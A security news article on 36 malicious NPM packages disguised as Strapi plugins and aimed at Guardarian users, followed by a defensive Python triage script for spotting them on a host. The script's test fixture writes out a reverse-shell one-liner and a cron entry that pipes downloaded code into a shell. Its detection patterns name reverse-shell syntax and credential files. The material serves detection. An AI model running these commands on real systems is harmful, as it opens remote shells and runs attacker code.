Malicious Strapi NPM Packages Target Guardarian Users

In short: attackers published fake Strapi plugins to steal credentials from, and run commands on, the systems that install them.
Attackers have targeted Strapi users with 36 malicious NPM packages that steal credentials and execute unauthorized commands. Users of the cryptocurrency payment gateway Guardarian appear to be the primary focus and should treat any exposure as urgent.
What Happened
A recent supply chain attack targets the Strapi ecosystem: attackers published 36 malicious NPM packages disguised as Strapi plugins. The packages were identified by the security firm SafeDep and carry a range of payloads that can lead to full compromise of the host that installs them.
How It Works
The malicious packages deliver a range of harmful functionalities, including:
- Redis code execution
- Docker container escape
- Credential harvesting
- Reverse shell deployment
One notable payload targets reachable Redis instances and uses them to inject crontab entries and drop webshells, giving the attacker persistence and remote code execution on the Redis host. Another payload targets Docker containers and escapes to the host, exposing host directories and the sensitive data they contain.
Who's Being Targeted
This campaign specifically targets users of the cryptocurrency payment gateway Guardarian. The attackers demonstrated a clear understanding of the Guardarian ecosystem, probing its databases and utilizing a Guardarian API module in their attacks.
Signs of Infection
Users who have installed these malicious packages might notice unusual activity, such as:
- Unexpected outbound connections from the host, consistent with a reverse shell
- Unauthorized access attempts to databases
- New or modified crontab entries and webshell files
- Changes to configuration files
How to Protect Yourself
If you suspect you have installed any of these malicious NPM packages, take immediate action:
- Rotate all credentials, including database passwords and API keys.
- Monitor your systems for unusual activity or unauthorized access.
- Remove any suspicious packages from your environment, and audit your lockfile and node_modules for dependencies you did not knowingly add, especially packages that run scripts at install time.
- Stay updated on security advisories related to Strapi and NPM packages.
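The following triage script ties together the "How It Works" payload classes, the "Signs of Infection" list and the package-audit step above. It is an added example, not code from the article or from SafeDep: it walks a node_modules tree flagging install-time lifecycle hooks, Strapi-branded packages published outside the official @strapi scope, and source files matching heuristic patterns for Redis crontab injection, Docker escape, reverse shells and credential theft; it then checks cron directories for the Redis RDB header that an abused Redis SAVE leaves behind and for entries that pipe downloaded content into a shell. All regexes, the package name `strapi-plugin-example-lookalike`, the 10.0.0.1 address and the fixture built by `build_sample` are constructed assumptions, not indicators taken from the real campaign.

```python
"""Host-side triage for a suspected malicious Strapi plugin install.
Added example, not code from the article or SafeDep; indicator patterns and
the sample fixture are constructed assumptions."""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs during `npm install`; the usual way a malicious
# package executes code before anyone reads its source.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic indicators for the payload classes named in the article. These
# are assumptions about what such payloads look like, not signatures from the
# real packages; expect false positives and review every hit by hand.
INDICATORS = {
    "redis-crontab": re.compile(r"config\s+set\s+dir\b|/var/spool/cron|/etc/cron", re.I),
    "docker-escape": re.compile(r"/var/run/docker\.sock|--privileged|-v\s+/:/", re.I),
    "reverse-shell": re.compile(r"/dev/tcp/|bash\s+-i\s+>&|nc\s+-e\s+/bin/sh", re.I),
    "cred-harvest": re.compile(r"\.npmrc|\.aws/credentials|\.ssh/id_", re.I),
}

# Magic bytes that open a Redis RDB dump. When an exposed Redis is told to
# SAVE into a cron directory, the resulting "crontab" starts with these.
RDB_MAGIC = b"REDIS"
CRON_DIRS = ("/var/spool/cron", "/var/spool/cron/crontabs", "/etc/cron.d")


def audit_package(pkg_dir: Path) -> list[str]:
    """Return findings for one installed package directory."""
    findings: list[str] = []
    try:
        meta = json.loads((pkg_dir / "package.json").read_text())
    except (OSError, ValueError):
        return findings
    name = meta.get("name", pkg_dir.name)
    scripts = meta.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"{name}: lifecycle hook {hook} runs {scripts[hook]!r}")
    # Strapi-branded packages outside the official @strapi scope deserve a
    # manual look (a heuristic, not proof of malice).
    if "strapi" in name.lower() and not name.startswith("@strapi/"):
        findings.append(f"{name}: strapi-named package outside @strapi scope")
    for js in sorted(pkg_dir.rglob("*.js")):
        try:
            text = js.read_text(errors="replace")
        except OSError:
            continue
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.append(f"{name}: {label} indicator in {js.relative_to(pkg_dir)}")
    return findings


def audit_node_modules(root: Path) -> list[str]:
    """Audit every top-level package in a node_modules tree, scoped ones included."""
    manifests = sorted(list(root.glob("*/package.json")) + list(root.glob("@*/*/package.json")))
    findings: list[str] = []
    for manifest in manifests:
        findings.extend(audit_package(manifest.parent))
    return findings


def audit_crontabs(cron_dirs=CRON_DIRS) -> list[str]:
    """Flag crontab files carrying a Redis RDB header or a fetch-and-run entry."""
    findings: list[str] = []
    for d in cron_dirs:
        for f in sorted(Path(d).glob("*")):
            if not f.is_file():
                continue
            try:
                data = f.read_bytes()
            except OSError:
                continue
            if RDB_MAGIC in data:
                findings.append(f"{f}: contains a Redis RDB header (written by an abused Redis SAVE?)")
            if re.search(rb"(curl|wget)\s+[^\n|]*\|\s*(ba)?sh\b", data):
                findings.append(f"{f}: cron entry pipes downloaded content into a shell")
    return findings


def build_sample(base: Path) -> tuple[Path, Path]:
    """Constructed fixture: a clean scoped package, a hypothetical look-alike with
    an install hook and a reverse shell, and a crontab as a Redis SAVE would leave it."""
    nm = base / "node_modules"
    clean = nm / "@strapi" / "plugin-upload"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps({"name": "@strapi/plugin-upload", "scripts": {"build": "tsc"}}))
    (clean / "index.js").write_text("module.exports = {};\n")
    bad = nm / "strapi-plugin-example-lookalike"  # hypothetical name, not a real package
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({"name": "strapi-plugin-example-lookalike", "scripts": {"postinstall": "node setup.js"}}))
    (bad / "setup.js").write_text('require("child_process").exec("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");\n')
    cron = base / "cron"
    cron.mkdir()
    (cron / "root").write_bytes(b"REDIS0011\xfa\tredis-ver\x057.0.0\n\n*/1 * * * * curl -s http://10.0.0.1/x.sh | sh\n\n\xff")
    return nm, cron


def run_demo() -> tuple[list[str], list[str]]:
    """Build the fixture in a temp dir and return (package findings, cron findings)."""
    base = Path(tempfile.mkdtemp(prefix="strapi-audit-"))
    nm, cron = build_sample(base)
    return audit_node_modules(nm), audit_crontabs([str(cron)])


if __name__ == "__main__":
    for group in run_demo():
        for line in group:
            print(line)
```

On a real host, run `audit_node_modules(Path("node_modules"))` and `audit_crontabs()` with the defaults; the cron check needs root to read other users' crontabs. A hit on the RDB magic is strong evidence of the Redis crontab technique, while the package-level hits are only leads: legitimate packages also use postinstall hooks and touch `.npmrc`, so confirm each finding before rotating credentials and removing the package.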
What You Should Do
SafeDep advises all Strapi users to be vigilant. The targeted nature of this attack underlines the importance of installing only trusted packages and regularly auditing dependencies. Rotating credentials and monitoring for suspicious activity limit the damage these packages can do once installed.